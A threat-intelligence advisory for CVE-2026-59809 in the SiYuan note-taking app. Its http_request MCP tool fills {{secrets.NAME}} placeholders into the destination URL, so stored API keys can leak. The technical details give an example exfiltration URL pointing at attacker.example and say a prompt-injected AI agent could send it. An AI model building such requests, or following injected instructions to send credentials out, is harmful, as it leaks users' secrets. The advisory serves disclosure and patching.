Junglewise Threat Intelligence

CVE-2026-59809: SiYuan secret exfiltration in http_request MCP tool

CVE-2026-59809 · Severity: medium · CVSS 4.9 · Published 2026-08-22

Technologies: SiYuan. Vendors: SiYuan.

Executive brief

SiYuan is a note-taking and knowledge management application that supports MCP (Model Context Protocol) tools for extending functionality. A vulnerability allows attackers to exfiltrate stored secrets (such as API keys) by crafting specially-crafted HTTP requests through the http_request MCP tool. An attacker can trick the application into sending confidential credentials to a public server under their control without user confirmation.

Technical details

The vulnerability is a sensitive information disclosure via insecure secret interpolation in the http_request MCP tool. The Secrets.Resolve() function substitutes {{secrets.NAME}} placeholders with plaintext values, but this substitution is applied to the destination URL parameter itself—not just headers and body where it is intended. An MCP client (including a prompt-injected AI agent) can craft a GET request with a malicious URL containing embedded secret placeholders (e.g., https://attacker.example/collect?token={{secrets.API_KEY}}) to exfiltrate credentials to an attacker-controlled public server. No confirmation prompt is required for GET requests since they are classified as safe actions. The existing SSRF mitigation (CheckHostSSRF) does not block requests to public infrastructure, only internal/private-network destinations, making it ineffective against this attack vector. Patch is available in v3.8.0.

Affected products

  • SiYuan SiYuan before v3.8.0

Timeline

  • 2026-08-08: disclosed: GitHub Security Advisory GHSA-853m-gvvm-6rvx published
  • 2026-08-22: advisory: CVE-2026-59809 and public advisories published
  • 2026-08-22: patched: Fix available in v3.8.0

References

Related threats